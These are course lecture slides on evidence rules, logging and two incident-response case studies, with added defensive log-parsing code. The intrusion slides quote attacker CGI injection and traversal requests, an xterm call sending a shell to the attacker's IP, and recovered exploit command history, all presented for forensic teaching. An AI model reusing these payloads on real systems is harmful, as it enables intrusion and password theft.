CSCI E-170: November 30, 2004
Administrivia, Federal Rules of Evidence, Logging, Integrity Management
Administrivia
- Project proposals are due today
  - Who is in your group?
  - What are you doing?
  - Not graded
- Quiz 2: You will be given 4 papers and expected to write a page on each.
Administrivia 2
- Some students have not turned in any work to date.
  - Think about dropping the course.
- Students who do not turn in a final project will fail.
Federal Rules of Evidence
- 9 Articles
- Many states follow FRE
- Codifies common law
- Why study them?
Article I: Ground Rules
- Rule 101 - Scope
  - Rule 1101 - Does not apply to preliminary questions of fact, grand jury, miscellaneous proceedings
- Rule 102 - Purpose
  - Fairness
  - Eliminate unjustifiable expense and delay
- Rule 103 - Rulings on Evidence
  - What to do when opposing parties disagree.
Article II: JUDICIAL NOTICE
- Every case involves the use of hundreds or thousands of non-evidence facts
- When a witness says "car", everyone assumes that the car is an automobile, not a railroad car, that it is self-propelled, and so on.
ARTICLE III: PRESUMPTIONS IN CIVIL ACTIONS AND PROCEEDINGS
- Determines who has the burden of rebutting the evidence.
- A presumption imposes on the party against whom it is directed the burden of going forward with evidence to rebut or meet the presumption.
ARTICLE IV: RELEVANCY AND ITS LIMITS
- Relevant evidence is admissible
- Irrelevant evidence is inadmissible
- Evidence that wastes time can be excluded
- Character evidence of defendant not admissible to prove conduct (unless introduced by defendant)
- Character evidence of victim introduced only in homicide case to rebut evidence that alleged victim was first aggressor
- Rule 412 - rape shield law
ARTICLE V: PRIVILEGES
- May be interpreted by the courts of the United States in light of reason and experience
ARTICLE VI: WITNESSES
- Rule 601 Every person is competent to be a witness (except as otherwise provided)
- Rule 602 Witness must have personal knowledge
- Rule 605 Judge cannot testify as witness
- Rule 606 Juror may not testify as witness
- Rule 612 Adverse party is entitled to access to writing used to refresh memory
ARTICLE VII: OPINIONS AND EXPERT TESTIMONY
- Rule 701 Lay witness may not testify based on scientific, technical, or other specialized knowledge
- Rule 702 Experts must be qualified, must use reliable principles and methods, and must apply those standards to this case.
- Rule 704 Experts may state an opinion on the ultimate issue, except for matters of mental state.
ARTICLE VIII: HEARSAY
- Rule 801 Hearsay is a statement, other than one made by the declarant while testifying at the trial or hearing, offered in evidence to prove the truth of the matter asserted.
- Many, many exceptions to hearsay
  - 803(5) - Recorded recollection
  - 803(6) - Records of regularly conducted activity
  - 803(7) - Absence of entry in records kept in accordance with 803(6) to prove nonoccurrence or nonexistence
ARTICLE IX: AUTHENTICATION AND IDENTIFICATION
- Rule 901 Documents must be authenticated; many examples given
- Rule 902 Some documents are self-authenticating (computer records aren't)
ARTICLE X: CONTENTS OF WRITINGS, RECORDINGS, AND PHOTOGRAPHS
- Rule 1002 Originals are required, except where duplicates may be admitted.
- Rule 1003 Duplicates may be admitted unless genuine questions are raised about the authenticity or in unfair circumstances.
- What is an original computer record?
ARTICLE XI: MISCELLANEOUS RULES
- Rule 1101 Applicability
- Rule 1102 Amendments
- Rule 1103 Title
Orin S. Kerr article
- What's the point?
- What are "records of regularly conducted activity"?
- Are computer records monolithic?
- How do you authenticate computer records? How are they challenged?
- When do the hearsay rules apply?
- What's the deal with postings from websites of white supremacist groups?
- What about email in a harassment case?
What is a log?
- Definition?
- Unix vs. Windows?
- Palm?
What gets logged?
- Logins / logouts
- Privilege escalation
- Security relevant events
What goes in a log?
Why keep logs?
Why look at logs? (Marcus)
- Policy
- Legality
- Cost saving
Common mistakes (Marcus)
1. Collecting it and not looking at it (might as well log to /dev/null)
2. Watching logs from perimeter systems while ignoring internal systems
3. Designing your log architecture before you decide what you're going to collect
4. Only looking for what you know you want to find instead of just looking to see what you find.
Common Mistakes 2
5. Proceeding without doing envelope estimates of load.
6. Thinking your logs are evidence if you don't collect them right
7. Forgetting that this is just a data management problem
8. Drinking the XML Kool-Aid
How are things logged?
- f = fopen(logfile, "w")
- syslog()
- logger
Web Logs
- access_log vs. error_log
- 65.54.188.137 - - [30/Nov/2004:00:16:54 -0500] "GET /photos/security/printTifs/medRes/onGray/platePlusStickerGreyMR.tif HTTP/1.0" 200 6017064 "-" "msnbot/0.3 (http://search.msn.com/msnbot.htm)"
- 66.35.208.62 - - [30/Nov/2004:00:17:38 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "Jakarta Commons-HttpClient/2.0.1"
Web logs: grep 'q=' www/simson.net/logs/access_log | sed 's/.*q=//' | awk '{print $1}' | head
- smartidentitycardclientdisney-gostart10"
- simsonhldelrieUTF-8oeUTF-8start20saN"
- backingupraiddriveshlenlrieUTF-8oeUTF-8start10saN"
- lzhufhlenlrieUTF-8start40saN"
- brownsimsonFORMSMCRT"
- 22homewiring22_sb_langen"
- 22wirelessphotoalbum22lr"
- lzhufpublicdomainhlenlrieUTF-8start10saN"
- simsonieISO-8859-1hlenbtnGGoogleSearchmeta"
- simsonieISO-8859-1hlenbtnGGoogleSearchmeta"
Mail Logs
- 2004-11-13 23:51:35 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domideltana@ex.com>: Unknown user
- 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domidrumsaloe@ex.com>: Unknown user
- 2004-11-13 23:51:36 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domie.douglass@ex.com>: Unknown user
- 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domielihli@ex.com>: Unknown user
- 2004-11-13 23:51:37 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domierdoc14@ex.com>: Unknown user
- 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domifdwyer@ex.com>: Unknown user
- 2004-11-13 23:51:38 H=ns.simson.net (64.7.15.234) [64.7.15.234] F=<truxnezze@swissonline.ch> rejected RCPT <domil.cpwhiz40@ex.com>: Unknown user
- 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <gayda@ex.com>: Unknown user
- 2004-11-13 23:52:01 H=ns.simson.net (cable-67-97-53-251.dct.al.charter.com) [64.7.15.234] F=<mvceubrfvsrm@charter.com> rejected RCPT <jensen@ex.com>: Unknown user
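An added example, not part of the lecture, that parses rejection lines in the Exim-style format shown above and flags a sending IP that is rejected for many distinct unknown recipients inside a short window, which is how a recipient-guessing run stands out from an ordinary mistyped address. The lines, hosts and addresses in SAMPLE_MAILLOG are constructed.

```python
import re
from datetime import datetime

# Exim-style rejection line, as on the mail log slide:
#   2004-11-13 23:51:35 H=host (helo) [ip] F=<sender> rejected RCPT <rcpt>: Unknown user
REJECT_RE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) H=(?P<host>\S+) (?:\([^)]*\) )?'
    r'\[(?P<ip>[^\]]+)\] F=<(?P<sender>[^>]*)> rejected RCPT <(?P<rcpt>[^>]+)>: (?P<why>.*)$'
)


def parse_reject(line):
    """Return the fields of one rejection line, or None for any other line."""
    m = REJECT_RE.match(line)
    if m is None:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
    return d


def find_dictionary_attacks(lines, window_s=60, threshold=5):
    """Map each sending IP to the largest number of distinct unknown recipients
    it was rejected for inside any window_s-second window, keeping only IPs
    that reach the threshold. One typo is one rejection; a dictionary run is
    many different unknown recipients from one IP in a minute."""
    events = {}                                   # ip -> [(ts, rcpt), ...]
    for line in lines:
        d = parse_reject(line)
        if d is None or not d["why"].startswith("Unknown user"):
            continue
        events.setdefault(d["ip"], []).append((d["ts"], d["rcpt"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        best = 0
        for i, (t0, _) in enumerate(evs):
            # distinct recipients among events within the window that starts at t0
            inside = {r for t, r in evs[i:] if (t - t0).total_seconds() <= window_s}
            best = max(best, len(inside))
        if best >= threshold:
            flagged[ip] = best
    return flagged


# Constructed sample in the slide's format (hosts and addresses are made up).
SAMPLE_MAILLOG = [
    "2004-11-13 23:51:35 H=ns.example.net (64.7.15.234) [64.7.15.234] F=<x@example.org> rejected RCPT <a@ex.com>: Unknown user",
    "2004-11-13 23:51:36 H=ns.example.net (64.7.15.234) [64.7.15.234] F=<x@example.org> rejected RCPT <b@ex.com>: Unknown user",
    "2004-11-13 23:51:36 H=ns.example.net (64.7.15.234) [64.7.15.234] F=<x@example.org> rejected RCPT <c@ex.com>: Unknown user",
    "2004-11-13 23:51:37 H=ns.example.net (64.7.15.234) [64.7.15.234] F=<x@example.org> rejected RCPT <d@ex.com>: Unknown user",
    "2004-11-13 23:51:38 H=ns.example.net (64.7.15.234) [64.7.15.234] F=<x@example.org> rejected RCPT <e@ex.com>: Unknown user",
    "2004-11-13 23:51:38 H=ns.example.net (64.7.15.234) [64.7.15.234] F=<x@example.org> rejected RCPT <a@ex.com>: Unknown user",
    "2004-11-13 23:52:01 H=cable.example.com [192.0.2.77] F=<y@example.com> rejected RCPT <j@ex.com>: Unknown user",
    "2004-11-13 23:52:02 H=cable.example.com [192.0.2.77] F=<y@example.com> rejected RCPT <k@ex.com>: relay not permitted",
    "2004-11-13 23:52:03 <= bounce@example.org H=mx.example.org [198.51.100.9] P=esmtp S=1234",
]

if __name__ == "__main__":
    for ip, n in find_dictionary_attacks(SAMPLE_MAILLOG).items():
        print(f"{ip}: {n} distinct unknown recipients within 60 s")
```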
Radius Logs
- Sun Mar 18 04:35:24 2001
  Acct-Session-Id = "00000000"
  NAS-IP-Address = 192.168.1.5
  Acct-Status-Type = Stop
  Acct-Session-Time = 0
  Acct-Delay-Time = 0
  Timestamp = 984918924
  Request-Authenticator = Verified
- Sun Mar 18 04:35:24 2001
  Acct-Session-Id = "06000004"
  User-Name = "admin"
  NAS-IP-Address = 192.168.1.5
  Acct-Status-Type = Start
  Acct-Authentic = Local
  Service-Type = Administrative-User
  Login-Service = Telnet
  Login-IP-Host = 192.168.1.1
  Acct-Delay-Time = 75
  Timestamp = 984918924
  Request-Authenticator = Verified
Security Incidents: Strange Authentication Attempts
- "I woke up to find these entries in my RADIUS log file":
  Tue Mar 30 10:26:00 2004: Auth: Login incorrect: config/system (from nas xxxx/S99)
  Tue Mar 30 10:26:00 2004: Auth: Login incorrect: config/password admin (from nas xxxx/S99)
  Tue Mar 30 10:26:00 2004: Auth: Login incorrect: config/13370n3z (from nas xxxx/S99)
  Tue Mar 30 10:26:01 2004: Auth: Login incorrect: password/fawkoffsz (from nas xxxx/S99)
  Tue Mar 30 10:26:01 2004: Auth: Login incorrect: password/save (from nas xxxx/S99)
- http://seclists.org/lists/incidents/2004/Mar/0116.html
Log architectures
Logging on Unix
- /etc/syslog.conf
- /etc/newsyslog.conf
- grep
- swatch
Logging on Windows
- Event Viewer
- Local security settings
Log hosts / Aggregation
Can you trust these logs?
October 7th, 1997
- 6:00pm
  - Arrive hotel in New York City.
  - Phone system does not support my modem.
  - Cell phone reception is terrible.
- 8:45pm
  - Phone call from Eric Bates.
  - "I think that we have a visitor."
Wed October 7th, 1997
- User http is logged in on ttyp0 and idle for one day
- bash-2.02$ w
   8:57PM  up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
  USER     TTY  FROM              LOGIN@   IDLE  WHAT
  http     p0   KRLDB110-06.spli  Tue02AM  1days /bin/sh
  simsong  p1   asy12.vineyard.n  8:42PM   15    -tcsh (tcsh)
  ericx    p2   mac-ewb.vineyard  8:46PM   0     script
  ericx    p3   mac-ewb.vineyard  8:46PM   11    top
  ericx    p4   mac-ewb.vineyard  8:53PM   1     sleep 5
  bash-2.02$
- (Other employees had seen this and ignored it!)
First step: Document the machine
- script(1) to create a transcript
- ps: process list
- netstat -a: open network connections
- (lsof): open files
- grep krldb access_log: likely avenue of attack
- Goals
  - Don't alarm the intruder.
  - Find the mechanism of access.
  - Find out what he/she did.
  - Plug the holes.
ps - processes
- Attacker only had two processes
  - /bin/sh on /dev/ttyp0 (2 copies)
  - PID 18671 and 26225
  - Idle since 2AM the previous day.
- walden 336 grep p0 plist
  http  18671  0.0  0.1  244  276  p0  Is  Tue02AM  0:02.23 /bin/sh
  http  26225  0.0  0.1  236  276  p0  I   Tue04AM  0:00.07 /bin/sh
  walden 337
netstat - network connections
- w gave incomplete hostname
  - KRLDB110-06.spli
- netstat revealed one connection -- X11!
- bash-2.02$ netstat -a
  Active Internet connections (including servers)
  Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
  . . .
  tcp        0      0  APACHE.VINEYARD..3098  KRLDB110-06.spli.X11   ESTABLISHED
- Use netstat -n to get the IP address, from which you can get the full DNS name.
access_log - showed attack
- grep krldb /usr/local/apache/logs/access_log
- krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
- krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
- krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
Attacker GETs
- GET /cgi-bin/phf?Qname=me%0als%20-lFa
- GET /cgi-bin/faxsurvey?ls%20-lFa
- GET /cgi-bin/view-source?../../../../../../../../etc/passwd
- GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd
- GET /cgi-bin/campas?%0als%20-lFa
- GET /cgi-bin/handler/useless_shitls20-lFa?data Download
- GET /cgi-bin/php.cgi?/etc/passwd
- GET /cgi-bin/faxsurvey?ls%20-lFa
- GET /cgi-bin/faxsurvey?uname%20-a
- GET /cgi-bin/faxsurvey?id
- GET /cgi-bin/faxsurvey?cat%20/etc/passwd
- GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/
- GET /cgi-bin/faxsurvey?id
- GET /cgi-bin/faxsurvey?pwd
- GET /cgi-bin/faxsurvey?/bin/pwd
- GET /cgi-bin/faxsurvey?ls%20-lFa
- GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/
Facts so far
- It looks like the faxsurvey program allowed the attacker to run arbitrary programs.
- No evidence that he ran xterm --- except for the X11 connection back to his machine.
- We don't know what he did or what else he knows.
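An added example, not part of the lecture, that parses access_log lines in the format of the Web Logs and access_log slides and applies defender-side heuristics for the kind of CGI probing listed under Attacker GETs (directory traversal, a password file named in the query, a shell command where a query string belongs). SAMPLE_LOG is constructed to resemble the slide's lines, and the three heuristics are illustrative rather than a complete signature set.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format, as on the access_log slides.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Command names that show up when a CGI script hands its query string to a shell.
CMD_RE = re.compile(r'^(?:\S*/)?(ls|cat|id|uname|pwd|xterm)(?:\s|$)')


def parse_clf(line):
    """Parse one access_log line into a dict, or return None if it is not CLF."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry


def suspicious_reasons(entry):
    """Defender-side heuristics: why a /cgi-bin request looks like a probe."""
    path = unquote(entry["path"])        # decode %20, %0a ... before matching
    if not path.startswith("/cgi-bin/"):
        return []
    _script, _, query = path.partition("?")
    reasons = []
    if "../" in query:
        reasons.append("directory traversal in query")
    if "/etc/passwd" in query or "master.passwd" in query:
        reasons.append("password file named in query")
    if CMD_RE.match(query):
        reasons.append("shell command in query string")
    return reasons


def scan_access_log(lines):
    """Return (host, script, reasons) for every request that trips a heuristic."""
    hits = []
    for line in lines:
        entry = parse_clf(line)
        if entry is None:
            continue
        reasons = suspicious_reasons(entry)
        if reasons:
            script = unquote(entry["path"]).partition("?")[0]
            hits.append((entry["host"], script, reasons))
    return hits


# Constructed sample lines modelled on the slides (not copied from a live log).
SAMPLE_LOG = [
    '65.54.188.137 - - [30/Nov/2004:00:16:54 -0500] "GET /blog/index.rdf HTTP/1.1" 200 8882 "-" "msnbot/0.3"',
    'krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0"',
    'krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0"',
    'this line is not in common log format',
]

if __name__ == "__main__":
    for host, script, reasons in scan_access_log(SAMPLE_LOG):
        print(host, script, "; ".join(reasons))
```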
Action plan
- Add filter to router to block all access from splitrock (his ISP).
- STOP his processes and gcore them to get command history.
  - kill -STOP PIDs
  - gcore -c file pid
  - strings file
- Rename/remove the faxsurvey program (part of hylafax system).
Selected environment variables from /bin/sh #1
- GATEWAY_INTERFACE=CGI/1.1
- REMOTE_HOST=krldb110-06.splitrock.net
- REMOTE_ADDR=209.156.113.121
- DOCUMENT_ROOT=/htdocs/biz/captiva
- REMOTE_PORT=4801
- SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
- LOGNAME=http
- REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
- DISPLAY=209.156.113.121:0.0
- SERVER_PORT=80
- SCRIPT_NAME=/cgi-bin/faxsurvey
History from /bin/sh #1
- st2.c
- cron.c
- cxterm.c
- x2.c
- qpush.c
- cat t.c
- cat .c
- cat s.c
- gc c
- ls -lFa
- ./s -v c2
- ./s p0
- ls -lFa /
- cat .s
- ls -lFa
- cat /w
- ls -lFa /
- cat .s
- _.s not found gcc -o s steal.c ls -lFa .c gcc -o s s.c ftp 209.156.113.121 gcc -o s st2.c ./s console t .s .121 qpush.c ppp.c t2.c cron.c cxterm.c tcsh x2.c README README.debian qpush qpush.c qpush.c.old gf not found /tmp mfs28 /bin/sh
Looks like the attacker was trying to get some sort of root-stealing exploit for Linux (or Debian Linux) to work on the machine.
Selected history from /bin/sh #2
- /bin/sh
- /bin/sh
- /etc/inetd.conf
- qpush.c
- /usr/bin/gcc
- n/gcc
- ./cc
- expr
- done
- /bin/sh
- inetd.conf
- t) telnet 127.1 143
- cd /etc
- cat .s
- which pwd
- ls -lFa
- expr $L + 1
- ls -lFa
- ./cc -10
Attacker sees that we are running imap.
Selected history from /bin/sh #2
- ./cc
- /tmp/.s
- /tmp
- cd /tmp
- cd .s
- L=100
- cd .s
- L=-100
- ls -lFa
- cd /tmp
- /bin/sh
- ./q 127.1
- load
- /bins
- _127.1
- _/bins
- ./cc
- ./cc -92
- ./cc -100
Attempts to exploit imap vulnerability.
Selected history from /bin/sh #2
- cat .s
- export L
- _.s
- cat /etc/passwd | grep "root"
- DISPLAY=209.156.113.121:0.0 -rvgdsg
- DISPLAY=209.156.113.121:0.0
- cat /etc/passwd | Grep "http"
- cat /etc/passwd | grep "http"
- cat /etc/passwd | grep "www"
- while
- done
- 2 L
- echo $L
- (./i 403 0xefbfd5e8 100; cat) | nc 127.1 143
- cx L
- L=1
- (./i 403 0xefbfd5e8 100; cat) | telnet 127.1 143
- echo
- ./cc $L
Searching for accounts and passwords.
Tries again for imap.
Selected history from /bin/sh #2
- uname
- ftp 209.156.113.121
- mv pp.c p.c
- ls -lFa mas
- ls -lFa /etc | grep "mas"
- cat master.passwd
- telnet 127.1 25
- locate modstat
- which modstat
- ls -lFa /usr/bin/mo
- locate modstate
- locate
- ico s.c
- locate modload
- grep
- ftp wildsau.idv.uni-lki
- i-lki
- cat /etc/inetd.conf
- ./q -0 127.1
Tries for shadow password file.
Tries again for sendmail.
Tries for Linux kernel module loader.
And so on.
Epilogue
- We spoke with Splitrock
  - They didn't seem to care (Splitrock is a Prodigy dialup port in Texas.)
  - Eventually we were forced to lower the block.
- FBI didn't care
  - This guy is clearly good
  - But we didn't have more than $8,000 in damages.
- Vulnerability in faxsurvey had been reported July 29, 1998 - nearly three months before the incident!
BUGTRAQ Report
- Date: Tue, 4 Aug 1998 07:41:24 -0700
- Reply-To: dod@muenster.net
- From: Tom <dod@MUENSTER.NET>
- Subject: remote exploit in faxsurvey cgi-script
- Hi!
- There exists a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server.
- All the attacker has to do is type "http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd" in his favorite Web-Browser to get a copy of your Password-File.
- All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack.
- AFAIK the problem exists in the call of 'eval'.
Epilogue 2
- Follow security advisories.
  - Hard to do.
- Don't let http
  - run gcc
  - read /usr/include
Detecting attacks with MRTG
- Developed by
  - Tobias Oetiker <oetiker@ee.ethz.ch>
  - Dave Rand <dlr@bungi.com>
- Designed to graph bandwidth of connections
- Useful for graphing any value that changes over time.
Typical MRTG uses
- T1 utilization
- Dialup utilization
More MRTG uses
- CPU utilization
- GIF response time
MRTG shows changes over time
- Hourly
- Daily
- Weekly
- Monthly
May 19, 1998
- 10:00 am
  - Meeting in Washington DC at the FBI.
- 3:30pm
  - Get on train from Washington -> Boston (8 hour train ride - good chance to relax.)
- 4:30pm
  - Call on cell phone from Aaron
Things are acting strange
- Single server
  - WWW, POP, IMAP, etc.
- CGI scripts terminating abnormally.
- POP server sometimes disconnecting before e-mail is downloaded.
- Finger doesn't work quite right.
- Rest of Internet seems normal.
What's wrong?
- No clue
- Reboot the computer!
- Problem goes away for 30 minutes, then comes back
Process list looks normal
  USER      PID %CPU %MEM  VSZ  RSS  TT  STAT STARTED     TIME COMMAND
  simsong  1770 86.4  2.0 5184 5212  p3  R     5:34PM  4:47.73 /usr/local/bin/perl /usr/local/bin/report.www -v (report.www)
  root    24659 31.4  0.0    0    0  ??  Z     4:19PM  0:00.00 (admin_server)
  root     2345  2.0  0.1  220  284  ??  S    31Dec69  0:00.02 (ping)
  root     1406  0.0  0.0    0    0  ??  Z     5:32PM  0:00.00 (junkbuster)
  root        0  0.0  0.0    0    0  ??  DLs  Mon01PM  0:00.30 (swapper)
  root        1  0.0  0.1  148  288  ??  Ss   Mon01PM  0:01.63 /sbin/init
  root        2  0.0  0.0    0   12  ??  DL   Mon01PM  0:00.01 (pagedaemon)
  root       15  0.0  0.0   68   64  ??  Is   Mon01PM  0:00.00 asyncd 2
  root       17  0.0  0.0   68   64  ??  Is   Mon01PM  0:00.02 asyncd 2
  root       26  0.0  0.8  748 2008  ??  Ss   Mon01PM  0:00.67 mfs -o rw -s 40960 /dev/sd0b /tmp (mount_mfs)
  root       51  0.0  0.1  268  296  ??  Ss   Mon01PM  0:02.92 gettyd -s
  root       62  0.0  0.1  160  340  ??  Ss   Mon01PM  1:19.11 syslogd
  daemon     65  0.0  0.1  112  184  ??  Ss   Mon01PM  0:01.36 portmap
  root       72  0.0  0.1  216  300  ??  Ss   Mon01PM  0:01.34 mountd
  root       74  0.0  0.1  144  288  ??  Is   Mon01PM  0:00.01 nfsd-master (nfsd)
  root       76  0.0  0.0   76  100  ??  I    Mon01PM  0:00.00 nfsd-server (nfsd)
  root       77  0.0  0.0   76  100  ??  I    Mon01PM  0:00.04 nfsd-server (nfsd)
  root       78  0.0  0.0   76  100  ??  I    Mon01PM  0:00.00 nfsd-server (nfsd)
MRTG reveals a problem
- Something is eating a lot of outgoing bandwidth
  - BLUE is transmitted data
  - GREEN is received data
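An added example (not from the lecture, and not MRTG's own code) of the arithmetic behind an MRTG-style bandwidth graph: it turns polled ifOutOctets counter values into per-interval byte rates, handles the 32-bit counter wrap, and flags intervals whose outbound rate jumps well above the recent median, which is the kind of change that made the problem visible here. SAMPLE_OUT is a constructed series of polls at MRTG's five-minute interval.

```python
COUNTER_MAX = 2 ** 32          # ifInOctets/ifOutOctets are 32-bit SNMP counters


def octet_rates(samples):
    """Turn (epoch_seconds, counter) samples into per-interval bytes/second,
    correcting for a 32-bit counter wrap between two polls."""
    rates = []
    for (t0, c0), (t1, c1) in zip(samples, samples[1:]):
        delta = c1 - c0
        if delta < 0:                     # counter wrapped since the last poll
            delta += COUNTER_MAX
        rates.append(delta / (t1 - t0))
    return rates


def median(values):
    s = sorted(values)
    n = len(s)
    return s[n // 2] if n % 2 else (s[n // 2 - 1] + s[n // 2]) / 2


def flag_outbound_spikes(samples, history=6, factor=5.0):
    """Return the indices of intervals whose outbound rate exceeds `factor`
    times the median of the preceding `history` intervals. The median, not the
    mean, is used as the baseline so one earlier spike does not hide the next;
    a sustained jump therefore shows up as a run of flagged intervals."""
    rates = octet_rates(samples)
    flagged = []
    for i in range(history, len(rates)):
        baseline = median(rates[i - history:i])
        if baseline > 0 and rates[i] > factor * baseline:
            flagged.append(i)
    return flagged


# Constructed ifOutOctets polls every 300 s: six quiet intervals at 50 kB/s,
# then the counter wraps and three intervals run at 900 kB/s.
SAMPLE_OUT = [
    (0,    4200000000),
    (300,  4215000000),
    (600,  4230000000),
    (900,  4245000000),
    (1200, 4260000000),
    (1500, 4275000000),
    (1800, 4290000000),
    (2100, 265032704),     # 4290000000 + 270000000, wrapped modulo 2**32
    (2400, 535032704),
    (2700, 805032704),
]

if __name__ == "__main__":
    for i, r in enumerate(octet_rates(SAMPLE_OUT)):
        mark = " <-- spike" if i in flag_outbound_spikes(SAMPLE_OUT) else ""
        print(f"interval {i}: {r / 1000:.1f} kB/s out{mark}")
```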
Process list shows a problem far down from the top
  ftp   1471  0.0  0.2  740  496  ??  I  12:28PM  0:13.88 ds9.kulnet.kuleuven.ac.be: anonymous/mailtothedude@iname.com: RETR pwa98cbl.zip\r\n (ftpd)
  ftp   1750  0.0  0.2  752  504  ??  S  12:32PM  0:12.79 ds9.kulnet.kuleuven.ac.be: anonymous/guest@: RETR pwa98cbj.zip\r\n (ftpd)
  ftp   6982  0.0  0.2  288  480  ??  S   1:20PM  0:17.21 142.194.48.68: anonymous/getright@: RETR /simson/open/nothing_here/this_site_sucks/pwa98cbg.zip\r\n (ftpd)
  ftp  10062  0.0  0.2  288  480  ??  S   1:53PM  0:00.27 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/   /calibreX/Win98.Final-PWA/pwa98cbf.zip\r\n (ftpd)
  ftp  10088  0.0  0.2  288  480  ??  S   1:54PM  0:00.27 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/   /calibreX/Win98.Final-PWA/pwa98cbe.zip\r\n (ftpd)
  ftp  10125  0.0  0.2  288  480  ??  S   1:54PM  0:00.28 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/   /calibreX/Win98.Final-PWA/pwa98cbd.zip\r\n (ftpd)
  ftp  10251  0.0  0.2  288  480  ??  S   1:55PM  0:00.28 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/   /calibreX/Win98.Final-PWA/pwa98cbc.zip\r\n (ftpd)
- Total simultaneous FTP transfers: 106
Netstat reveals further information
- walden 424 more netstat-list
  Active Internet connections (including servers)
  Proto Recv-Q Send-Q  Local Address      Foreign Address         (state)
  tcp        0      0  VINEYARD.NET.http  a2p09.capcon.net.1203   SYN_RCVD
  tcp        0      0  VINEYARD.NET.http  DSY4.VINEYARD.NE.1406   SYN_RCVD
  tcp        0      0  VINEYARD.NET.pop   ASY5.VINEYARD.NE.2117   ESTABLISHED
  tcp        0   1513  VINEYARD.NET.http  207.112.204.161.1570    FIN_WAIT_1
  tcp        0   8500  VINEYARD.NET.http  srry01m05-128.bc.1505   ESTABLISHED
  tcp        0   7168  VINEYARD.NET.http  hd62-160.hil.com.2033   ESTABLISHED
  tcp        0   8192  VINEYARD.NET.http  208.232.119.2.4125      ESTABLISHED
  tcp        0   7552  VINEYARD.NET.20    hades.osc.epsilo.2943   ESTABLISHED
  tcp        0   6952  VINEYARD.NET.http  ww-tl01.proxy.ao.37672  ESTABLISHED
  tcp        0      0  VINEYARD.NET.ftp   dns1.bit-net.com.2268   ESTABLISHED
  tcp        0      0  VINEYARD.NET.http  cs206-32.student.1068   FIN_WAIT_2
  tcp        0      0  VINEYARD.NET.ftp   spc-isp-mon-uas-.1037   ESTABLISHED
  tcp        0      0  VINEYARD.NET.ftp   kenny26.zip.com..1033   ESTABLISHED
  tcp        0      0  VINEYARD.NET.http  cs206-32.student.1067   FIN_WAIT_2
  tcp        0      0  VINEYARD.NET.ftp   sladl3p24.ozemai.1676   ESTABLISHED
  tcp        0   8760  VINEYARD.NET.pop   ASY10.VINEYARD.N.1043   ESTABLISHED
We've been warezed!
- ftp://vineyard.net/simson/open
  - World-writable FTP directory.
- Two directories were created in open
  - Three spaces ("   ")
  - nothing_here
File list
- ./open/   /
- ./open/   /calibreX/
- ./open/   /calibreX/Win98.Final-PWA/
- ./open/   /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
- ./open/   /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/PWA.NFO
- ./open/   /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/pwa98rfl1.zip
